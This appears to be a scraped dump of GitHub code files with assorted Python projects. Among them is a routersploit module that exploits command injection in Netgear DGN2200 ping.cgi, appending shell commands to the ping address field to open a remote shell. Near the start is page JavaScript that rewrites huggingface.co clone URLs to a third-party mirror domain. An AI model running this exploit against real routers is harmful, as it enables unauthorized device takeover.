{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'OCR模型免费转Markdown' && linkText !== 'OCR模型免费转Markdown' ) { link.textContent = 'OCR模型免费转Markdown'; link.href = 'https://fast360.xyz'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== '模型下载攻略' ) { link.textContent = '模型下载攻略'; link.href = '/'; replacedLinks.add(link); } // 删除Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'OCR模型免费转Markdown'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); \"\n\t\tpos = html.find('
')\n\t\tself.assertTrue( len(pos) == 1, 'The HTML does contain div\\'s')\n\t\t\n\tdef test_if_html_does_not_contain_a_div(self)\n\t\thtml = \"walla walla washington\"\n\t\tpos = html.find('
')\n\t\tself.assert( pos == -1, \"The HTML does not contain div's\")\n\t\t\n\tdef refactor(aList):\n\t\tsum = 0\n\t\tif len(aList) == 0:\n\t\t\treturn False, 0\n\t\tfor eachItem in aList:\n\t\t\tisValidNumber = str(eachItem).isdigit()\n\t\t\tif isValidNumber == False:\n\t\t\t\treturn False, 0\n\t\t\telse:\n\t\t\t\tsum = sum + eachItem\n\t\treturn True, sum\n\t\t\n\t\t\ndef suite():\n\tsuite = unittest.TestSuite()\n\tsuite.addTest(unittest.makeSuite(UnitTestSuite))\n\treturn suite"},"size":{"kind":"number","value":939,"string":"939"}}},{"rowIdx":128451,"cells":{"max_stars_repo_path":{"kind":"string","value":"DIZED_APPS/INCANTATION/modules/exploits/routers/netgear/dgn2200_ping_cgi_rce.py"},"max_stars_repo_name":{"kind":"string","value":"tanc7/ArmsCommander-TestBed"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2172078"},"content":{"kind":"string","value":"from routersploit import (\n exploits,\n print_error,\n print_success,\n print_status,\n mute,\n validators,\n http_request,\n random_text,\n shell,\n)\n\n\nclass Exploit(exploits.Exploit):\n \"\"\"\n Exploits Netgear DGN2200 RCE vulnerability in ping.cgi\n \"\"\"\n __info__ = {\n 'name': 'Netgear DGN2200 RCE',\n 'description': 'Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script',\n 'authors': [\n 'SivertPL', # vulnerability discovery\n ' <[at]>', # routesploit module\n ],\n 'references': [\n 'https://www.exploit-db.com/exploits/41394/',\n 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077',\n ],\n 'devices': [\n 'Netgear DGN2200v1',\n 'Netgear DGN2200v2',\n 'Netgear DGN2200v3',\n 'Netgear DGN2200v4',\n ],\n }\n\n target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address\n port = exploits.Option(80, 'Target Port') # target port\n\n login = exploits.Option('admin', 'Username')\n password = exploits.Option('password', 'Password')\n\n def run(self):\n \"\"\"\n Method run on \"exploit\" or \"run\" command (both works the same way). It should result in exploiting target.\n \"\"\"\n if self.check():\n print_success(\"Target is vulnerable\")\n print_status(\"Invoking command loop...\")\n shell(self, architecture=\"mipsbe\")\n else:\n print_error(\"Target is not vulnerable\")\n\n def execute(self, command):\n url = \"{}:{}/ping.cgi\".format(self.target, self.port)\n data = {'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': \"Ping\", 'ping_IPAddr': \"12.12.12.12; \" + command}\n referer = \"{}/DIAG_diag.htm\".format(self.target)\n headers = {'referer': referer}\n\n r = http_request(method=\"POST\", url=url, data=data, auth=(self.login, self.password), headers=headers)\n if r is None:\n return \"\"\n\n result = self.parse_output(r.text)\n return result.encode('utf-8')\n\n def parse_output(self, text):\n yet = False\n result = []\n for line in text.splitlines():\n if line.startswith(\"\"):\n break\n result.append(line)\n return \"\\n\".join(result)\n\n @mute\n def check(self):\n \"\"\"\n Method that verifies if the target is vulnerable.\n \"\"\"\n rand_marker = random_text(6)\n command = \"echo {}\".format(rand_marker)\n\n if rand_marker in self.execute(command):\n return True\n\n return False\n"},"size":{"kind":"number","value":2836,"string":"2,836"}}},{"rowIdx":128452,"cells":{"max_stars_repo_path":{"kind":"string","value":"antigen_discovery/nepitope/peptide_utilities.py"},"max_stars_repo_name":{"kind":"string","value":"Mazzafish/neoantigen"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"id":{"kind":"string","value":"2170417"},"content":{"kind":"string","value":"import os\nimport glob\nfrom shutil import move, rmtree\nfrom nepitope import net_MHC_interface\nimport importlib\nimportlib.reload(net_MHC_interface)\n\n\nclass Swaps(object):\n\n list_AA = ['A', 'R', 'N', 'D', 'C', 'Q', 'E', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P', 'S', 'T', 'W', 'Y', 'V']\n\n def __init__(self, high_affinity_df, fasta_file_dir, net_mhc_path, proteins=None):\n\n self.df = high_affinity_df\n self.protein_ids = self._get_prot_ids(proteins)\n #self.protein_input_df = self.df[self.df.ID.isin(self.protein_ids)]\n self.fasta_dir = fasta_file_dir\n self.mhc_path = net_mhc_path\n\n def find_swaps_write_to_fasta(self):\n\n nmers = self._get_nmers(self.df)\n alleles = self._get_alleles(self.df)\n\n mhc_commands = []\n for prot_id in self.protein_ids:\n try:\n os.mkdir(self.fasta_dir + '%s/' % prot_id)\n except:\n pass\n for nmer in nmers:\n for allele in alleles:\n sliced = self._slice_df(nmer, allele, prot_id)\n if self.check_size(sliced):\n list_of_lists = sliced[['n-mer', 'Allele', 'ID', 'Pos', 'Peptide']].values.tolist()\n\n for item in list_of_lists:\n swaps = self._create_swaps(item[-1])\n fasta_file = self._open_write_fasta(item, swaps, prot_id)\n self._create_mhc_command(item, fasta_file)\n\n self.reorg_files(prot_id)\n\n return mhc_commands\n\n def reorg_files(self, prot_id):\n\n prot_dir = self.fasta_dir + '%s' % prot_id\n dirs = glob.glob(prot_dir + '/mhc_preds*')\n final_dest = prot_dir + '/preds_per_swap'\n try:\n os.mkdir(final_dest)\n except:\n pass\n for i in dirs:\n file_source = glob.glob(i + '/*.xls')\n move(file_source[0], final_dest)\n print('Swap predictions regrouped to %s' % final_dest)\n for i in dirs:\n rmtree(i)\n\n def _create_mhc_command(self, item, fasta_location):\n nmer = [item[0]]\n allele = [item[1]]\n net_mhc = net_MHC_interface.netMHCComand(self.mhc_path, fasta_location, nmers=nmer, alleles=allele)\n net_mhc.create_text_command(write_to_txt=True)\n net_mhc.run_netMHC()\n\n def _open_write_fasta(self, data, swaps, prot_id):\n file_name = \"_\".join([self.fasta_dir + '%s/' % prot_id, 'swap', data[-1], 'Pos', str(data[-2]), 'ID', str(data[-3]).replace('_', '-'),\n 'Allele', str(data[-4]), 'nmer', str(data[-5])])\n\n with open(file_name + '.fasta', 'w') as inf:\n for swap in swaps:\n inf.write(\"\".join(['>', prot_id, '_', swap, '\\n']))\n inf.write(swap + '\\n')\n\n return file_name + '.fasta'\n\n def _create_swaps(self, peptide):\n\n list_peps = []\n for i in range(len(peptide)):\n for k in range(len(self.list_AA)):\n list_peps.append(self._insert_aa(peptide, i, self.list_AA[k]))\n\n return list_peps\n\n def _slice_df(self, nmer, allele, prot_id):\n return self.df.loc[(self.df['n-mer'] == nmer) & (self.df['Allele'] == allele) & (self.df['ID'] == prot_id)]\n\n @staticmethod\n def _insert_aa(string, index, aa):\n hash_string = list(string)\n del hash_string[index]\n hash_string.insert(index, aa)\n return \"\".join(hash_string)\n\n def _get_prot_ids(self, proteins):\n if proteins == 'All':\n return list(self.df['ID'].unique())\n if isinstance(proteins, list):\n return self.check_existence(proteins)\n\n def check_existence(self, proteins):\n for protein in proteins:\n if protein not in self.df.ID.unique():\n raise ValueError('Input protein %s not found in csv files' % protein)\n return proteins\n\n @staticmethod\n def _get_nmers(pepdata):\n return pepdata['n-mer'].unique()\n\n @staticmethod\n def _get_alleles(pepdata):\n return pepdata['Allele'].unique()\n\n @staticmethod\n def check_size(sliced):\n if len(sliced) == 0:\n return False\n else:\n return True\n"},"size":{"kind":"number","value":4250,"string":"4,250"}}},{"rowIdx":128453,"cells":{"max_stars_repo_path":{"kind":"string","value":"modules/autodeop/autodeop.py"},"max_stars_repo_name":{"kind":"string","value":"clinchergt/pyCoBot"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2171223"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom pycobot.pycobot import BaseModel\nfrom peewee.peewee import CharField\nfrom irc import client\n\n\nclass autodeop:\n\n def __init__(self, core, client):\n core.addCommandHandler(\"autodeop\", self, cpriv=6, cprivchan=True, chelp=\n \"Activa o desactiva el autodeop en un canal. Sintaxis: autodeop \"\n \" \")\n try:\n autodeopt.create_table(True)\n except:\n pass\n core.addHandler(\"mode\", self, \"modeprot\")\n\n def autodeop_p(self, bot, cli, event):\n if len(event.splitd) > 0:\n return event.splitd[0]\n return 1\n\n def autodeop(self, bot, cli, ev):\n if len(ev.splitd) < 1:\n cli.msg(ev.target, \"\\00304Error\\003: Faltan parametros.\")\n return 1\n\n ch = autodeopt.select().where(autodeopt.channel == ev.splitd[0])\n\n if ev.splitd[1] == \"on\":\n if ch.count() == 0:\n autodeopt.create(channel=ev.splitd[0])\n cli.msg(ev.target, \"Se ha activado el autodeop en \\2\" +\n ev.splitd[0])\n else:\n cli.msg(ev.target, \"\\00304Error\\003: El autodeop ya esta a\"\n \"ctivado en el canal \\2\" + ev.splitd[0])\n else:\n if ch.count() != 0:\n r = autodeopt.get(autodeopt.channel == ev.splitd[0])\n r.delete_instance()\n cli.msg(ev.target, \"Se ha desactivado el autodeop en \\2\" +\n ev.splitd[0])\n else:\n cli.msg(ev.target, \"\\00304Error\\003: El autodeop no esta a\"\n \"ctivado en el canal \\2\" + ev.splitd[0])\n\n def modeprot(self, cli, ev):\n c = autodeopt.get(autodeopt.channel == ev.target)\n if c is False:\n return 1\n if client.parse_nick(ev.source)[1] == cli.nickname:\n return 1\n x = self.parsemode(cli, ev)\n for w in x:\n if w == cli.nickname:\n continue\n cli.mode(ev.target, \"-o \" + w)\n\n def parsemode(self, cli, ev):\n res = []\n cmodelist = cli.features.chanmodes\n param = cmodelist[0] + cmodelist[1] + cmodelist[2]\n for i, val in enumerate(cli.features.prefix):\n param = param + cli.features.prefix[val]\n pos = 0\n for c in ev.arguments[0]:\n if c == \"-\":\n rving = False\n pass\n elif c == \"+\":\n rving = True\n else:\n if c in param:\n pos = pos + 1\n if rving is False:\n continue\n\n if c == \"o\":\n res.append(ev.arguments[pos]) # BEEP BEEP BEEP BEEP\n return res\n\n\nclass autodeopt(BaseModel):\n channel = CharField(primary_key=True)\n\n class Meta:\n db_table = \"autodeop\"\n"},"size":{"kind":"number","value":2836,"string":"2,836"}}},{"rowIdx":128454,"cells":{"max_stars_repo_path":{"kind":"string","value":"esphomeyaml/components/sensor/bmp085.py"},"max_stars_repo_name":{"kind":"string","value":"johnerikhalse/esphomeyaml"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2172451"},"content":{"kind":"string","value":"import voluptuous as vol\n\nimport esphomeyaml.config_validation as cv\nfrom esphomeyaml.components import sensor\nfrom esphomeyaml.const import CONF_ADDRESS, CONF_MAKE_ID, CONF_NAME, CONF_PRESSURE, \\\n CONF_TEMPERATURE, CONF_UPDATE_INTERVAL\nfrom esphomeyaml.helpers import App, Application, HexIntLiteral, add, variable\n\nDEPENDENCIES = ['i2c']\n\nMakeBMP085Sensor = Application.MakeBMP085Sensor\n\nPLATFORM_SCHEMA = sensor.PLATFORM_SCHEMA.extend({\n cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(MakeBMP085Sensor),\n vol.Required(CONF_TEMPERATURE): cv.nameable(sensor.SENSOR_SCHEMA),\n vol.Required(CONF_PRESSURE): cv.nameable(sensor.SENSOR_SCHEMA),\n vol.Optional(CONF_ADDRESS): cv.i2c_address,\n vol.Optional(CONF_UPDATE_INTERVAL): cv.update_interval,\n})\n\n\ndef to_code(config):\n rhs = App.make_bmp085_sensor(config[CONF_TEMPERATURE][CONF_NAME],\n config[CONF_PRESSURE][CONF_NAME],\n config.get(CONF_UPDATE_INTERVAL))\n bmp = variable(config[CONF_MAKE_ID], rhs)\n if CONF_ADDRESS in config:\n add(bmp.Pbmp.set_address(HexIntLiteral(config[CONF_ADDRESS])))\n\n sensor.setup_sensor(bmp.Pbmp.Pget_temperature_sensor(), bmp.Pmqtt_temperature,\n config[CONF_TEMPERATURE])\n sensor.setup_sensor(bmp.Pbmp.Pget_pressure_sensor(), bmp.Pmqtt_pressure,\n config[CONF_PRESSURE])\n\n\nBUILD_FLAGS = '-DUSE_BMP085_SENSOR'\n"},"size":{"kind":"number","value":1439,"string":"1,439"}}},{"rowIdx":128455,"cells":{"max_stars_repo_path":{"kind":"string","value":"Python3/0909-Snakes-and-Ladders/soln-1.py"},"max_stars_repo_name":{"kind":"string","value":"wyaadarsh/LeetCode-Solutions"},"max_stars_count":{"kind":"number","value":5,"string":"5"},"id":{"kind":"string","value":"2172469"},"content":{"kind":"string","value":"class Solution:\n def snakesAndLadders(self, board: List[List[int]]) -> int:\n # this is a bfs\n def num_to_rc(num):\n N = len(board)\n num -= 1\n r, c = divmod(num, N)\n if r % 2:\n c = N - 1 - c\n r = N - 1 - r\n return r, c\n frontier = collections.deque([1])\n seen = {1}\n target = len(board) * len(board)\n step = 0\n while frontier:\n sz = len(frontier)\n for _ in range(sz):\n x = frontier.popleft()\n if x == target:\n return step\n for dx in range(1, 7):\n nx = x + dx\n if nx <= target:\n r, c = num_to_rc(nx)\n if board[r][c] != -1:\n nx = board[r][c]\n if nx not in seen:\n seen.add(nx)\n frontier.append(nx)\n step += 1\n return -1\n"},"size":{"kind":"number","value":1040,"string":"1,040"}}},{"rowIdx":128456,"cells":{"max_stars_repo_path":{"kind":"string","value":"orchestrate_ai/mirex_lyrics_dataset/trainer.py"},"max_stars_repo_name":{"kind":"string","value":"amrittb/orchestrate-a"},"max_stars_count":{"kind":"number","value":18,"string":"18"},"id":{"kind":"string","value":"2172327"},"content":{"kind":"string","value":"import computation_graph\n\n\"\"\" Trains Lyrics Dataset\n\nRuns training in computation graph\n\"\"\"\ndef train_lyrics():\n\tcomputation_graph.train_lyrics()"},"size":{"kind":"number","value":145,"string":"145"}}},{"rowIdx":128457,"cells":{"max_stars_repo_path":{"kind":"string","value":"vendas/core/views.py"},"max_stars_repo_name":{"kind":"string","value":"JacksonOsvaldo/bc_calcado-vendas"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2172250"},"content":{"kind":"string","value":"from django.shortcuts import render, resolve_url\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.db.models import F, Count\nfrom django.views.generic import TemplateView, ListView, DetailView\nfrom django.views.generic.edit import UpdateView\nfrom django.forms.models import inlineformset_factory\nfrom .models import Customer, Seller, Brand, Product, Sale, SaleDetail\nfrom .forms import SaleForm, SaleDetailForm\nfrom .mixins import CounterMixin, FirstnameSearchMixin\n\n\nhome = TemplateView.as_view(template_name='index.html')\n\nabout = TemplateView.as_view(template_name='about.html')\n\n\nclass CustomerList(CounterMixin, FirstnameSearchMixin, ListView):\n template_name = 'core/person/customer_list.html'\n model = Customer\n paginate_by = 8\n\n\nclass CustomerDetail(DetailView):\n template_name = 'core/person/customer_detail.html'\n model = Customer\n\n\nclass CustomerUpdate(UpdateView):\n template_name = 'core/person/customer_edit.html'\n model = Customer\n success_url = reverse_lazy('customer_detail')\n\n\nclass SellerList(CounterMixin, FirstnameSearchMixin, ListView):\n template_name = 'core/person/seller_list.html'\n model = Seller\n paginate_by = 8\n\n\nclass SellerDetail(DetailView):\n template_name = 'core/person/seller_detail.html'\n model = Seller\n\n\nclass BrandList(CounterMixin, ListView):\n template_name = 'core/product/brand_list.html'\n model = Brand\n\n\nclass ProductList(CounterMixin, ListView):\n template_name = 'core/product/product_list.html'\n model = Product\n paginate_by = 100\n\n def get_queryset(self):\n p = Product.objects.all()\n q = self.request.GET.get('search_box')\n # buscar por produto\n if q is not None:\n p = p.filter(product__icontains=q)\n # filtra produtos em baixo estoque\n if self.request.GET.get('filter_link', False):\n p = p.filter(stock__lt=F('stock_min'))\n # filtra produtos fora de linha\n if self.request.GET.get('outofline', False):\n p = p.filter(outofline=1)\n return p\n\n\ndef sale_create(request):\n order_forms = Sale()\n item_order_formset = inlineformset_factory(\n Sale, SaleDetail, form=SaleDetailForm, extra=0, can_delete=False,\n min_num=1, validate_min=True)\n\n if request.method == 'POST':\n forms = SaleForm(request.POST, request.FILES,\n instance=order_forms, prefix='main')\n formset = item_order_formset(\n request.POST, request.FILES, instance=order_forms, prefix='product')\n\n if forms.is_valid() and formset.is_valid():\n forms = forms.save()\n formset.save()\n return HttpResponseRedirect(resolve_url('core:sale_detail', forms.pk))\n\n else:\n forms = SaleForm(instance=order_forms, prefix='main')\n formset = item_order_formset(instance=order_forms, prefix='product')\n\n context = {\n 'forms': forms,\n 'formset': formset,\n }\n\n return render(request, 'core/sale/sale_form.html', context)\n\n\nclass SaleList(CounterMixin, ListView):\n template_name = 'core/sale/sale_list.html'\n model = Sale\n paginate_by = 20\n\n def get_queryset(self):\n # filtra vendas com um item\n if 'filter_sale_one' in self.request.GET:\n return Sale.objects.annotate(\n itens=Count('sales_det')).filter(itens=1)\n # filtra vendas com zero item\n if 'filter_sale_zero' in self.request.GET:\n return Sale.objects.annotate(\n itens=Count('sales_det')).filter(itens=0)\n # filtros no queryset\n qs = super(SaleList, self).get_queryset()\n # clica no cliente e retorna as vendas dele\n if 'customer' in self.request.GET:\n qs = qs.filter(customer=self.request.GET['customer'])\n # clica no vendedor e retorna as vendas dele\n if 'seller' in self.request.GET:\n qs = qs.filter(seller=self.request.GET['seller'])\n return qs\n\n\nclass SaleDetailView(DetailView):\n template_name = 'core/sale/sale_detail.html'\n model = Sale\n context_object_name = 'Sale'\n\n def get_context_data(self, **kwargs):\n sd = SaleDetail.objects.filter(sale=self.object)\n context = super(SaleDetailView, self).get_context_data(**kwargs)\n context['count'] = sd.count()\n context['Itens'] = sd\n return context\n"},"size":{"kind":"number","value":4409,"string":"4,409"}}},{"rowIdx":128458,"cells":{"max_stars_repo_path":{"kind":"string","value":"tests/batching/test_adaptive.py"},"max_stars_repo_name":{"kind":"string","value":"alexander-manley/MLServer"},"max_stars_count":{"kind":"number","value":191,"string":"191"},"id":{"kind":"string","value":"2172398"},"content":{"kind":"string","value":"import asyncio\nimport pytest\n\nfrom typing import List\n\nfrom mlserver.batching.adaptive import AdaptiveBatcher\nfrom mlserver.batching.shape import Shape\nfrom mlserver.types import InferenceRequest, RequestInput\nfrom mlserver.model import MLModel\nfrom mlserver.utils import generate_uuid\n\nfrom .conftest import TestRequestSender\n\n\nasync def test_batch_requests(\n adaptive_batcher: AdaptiveBatcher,\n send_request: TestRequestSender,\n):\n max_batch_size = adaptive_batcher._max_batch_size\n sent_requests = dict(\n await asyncio.gather(*[send_request() for _ in range(max_batch_size)])\n )\n\n batched_requests = [\n batched_req async for batched_req in adaptive_batcher._batch_requests()\n ]\n\n assert len(batched_requests) == 1\n assert batched_requests[0].inference_requests == sent_requests\n\n\nasync def test_batch_requests_timeout(\n adaptive_batcher: AdaptiveBatcher,\n send_request: TestRequestSender,\n):\n \"\"\"\n Test that a batch size smaller than the max batch size, the timeout is hit\n and the request gets processed.\n \"\"\"\n for _ in range(2):\n sent_request = dict([await send_request()])\n batched_requests = [\n batched_req async for batched_req in adaptive_batcher._batch_requests()\n ]\n\n assert len(batched_requests) == 1\n assert batched_requests[0].inference_requests == sent_request\n\n\nasync def test_batcher(\n adaptive_batcher: AdaptiveBatcher,\n send_request: TestRequestSender,\n sum_model: MLModel,\n):\n max_batch_size = adaptive_batcher._max_batch_size\n sent_requests = dict(\n await asyncio.gather(*[send_request() for _ in range(max_batch_size)])\n )\n\n await adaptive_batcher._batcher()\n\n assert sent_requests.keys() == adaptive_batcher._async_responses.keys()\n\n for internal_id, sent_request in sent_requests.items():\n async_response = adaptive_batcher._async_responses[internal_id]\n\n response = await async_response\n assert sent_request.id == response.id\n\n expected = await sum_model.predict(sent_request)\n assert expected == response\n\n\nasync def test_batcher_propagates_errors(\n adaptive_batcher: AdaptiveBatcher,\n send_request: TestRequestSender,\n mocker,\n):\n message = \"This is an error\"\n\n async def _async_exception():\n raise Exception(message)\n\n max_batch_size = adaptive_batcher._max_batch_size\n sent_requests = dict(\n await asyncio.gather(*[send_request() for _ in range(max_batch_size)])\n )\n\n adaptive_batcher._predict_fn = mocker.stub(\"_predict_fn\")\n adaptive_batcher._predict_fn.return_value = _async_exception()\n await adaptive_batcher._batcher()\n\n for internal_id, _ in sent_requests.items():\n with pytest.raises(Exception) as err:\n await adaptive_batcher._async_responses[internal_id]\n\n assert str(err.value) == message\n\n\nasync def test_batcher_cancels_responses(\n adaptive_batcher: AdaptiveBatcher,\n mocker,\n):\n message = \"This is an error\"\n\n async def _async_exception():\n raise Exception(message)\n\n num_requests = adaptive_batcher._max_batch_size * 2 + 2\n\n adaptive_batcher._batcher = mocker.stub(\"_batcher\")\n adaptive_batcher._batcher.side_effect = iter(_async_exception, None)\n\n requests = [\n InferenceRequest(\n id=generate_uuid(),\n inputs=[\n RequestInput(\n name=\"input-0\",\n shape=[1, 3],\n datatype=\"INT32\",\n data=[idx, idx + 1, idx + 2],\n )\n ],\n )\n for idx in range(num_requests)\n ]\n\n responses = await asyncio.gather(\n *[adaptive_batcher.predict(request) for request in requests],\n return_exceptions=True,\n )\n\n for response in responses:\n assert isinstance(response, Exception)\n assert str(response) == message\n\n\n@pytest.mark.parametrize(\n \"requests\",\n [\n [\n InferenceRequest(\n id=f\"request-{idx}\",\n inputs=[\n RequestInput(\n name=\"input-0\",\n shape=[1, 3],\n datatype=\"INT32\",\n data=[idx, idx + 1, idx + 2],\n )\n ],\n )\n # 10 is the max_batch_size for sum_model\n # Make sure one batch is only half-full\n for idx in range(10 * 2 + 2)\n ],\n [\n InferenceRequest(\n id=\"large-request\",\n inputs=[\n # 10 is the max batch size, so we send a minibatch with\n # 20 entries\n RequestInput(\n name=\"input-0\",\n shape=[10 * 2, 3],\n datatype=\"INT32\",\n data=[n for n in range(10 * 2 * 3)],\n )\n ],\n ),\n InferenceRequest(\n id=\"regular-request\",\n inputs=[\n RequestInput(\n name=\"input-0\",\n shape=[1, 3],\n datatype=\"INT32\",\n data=[1000, 1001, 1002],\n )\n ],\n ),\n ],\n ],\n)\nasync def test_predict(\n requests: List[InferenceRequest],\n adaptive_batcher: AdaptiveBatcher,\n sum_model: MLModel,\n):\n responses = await asyncio.gather(\n *[adaptive_batcher.predict(request) for request in requests]\n )\n\n assert len(requests) == len(responses)\n for req, res in zip(requests, responses):\n assert req.id == res.id\n\n req_shape = Shape(req.inputs[0].shape)\n res_shape = Shape(res.outputs[0].shape)\n assert req_shape.batch_size == res_shape.batch_size\n\n expected = await sum_model.predict(req)\n assert res == expected\n"},"size":{"kind":"number","value":5939,"string":"5,939"}}},{"rowIdx":128459,"cells":{"max_stars_repo_path":{"kind":"string","value":"vue_uikit/vues/tools/errorCode.py"},"max_stars_repo_name":{"kind":"string","value":"Xpf123131123/django-web"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2171024"},"content":{"kind":"string","value":"\"\"\"\nerrorCode\n\"\"\"\n\n\n#\nuserDoesNotExits 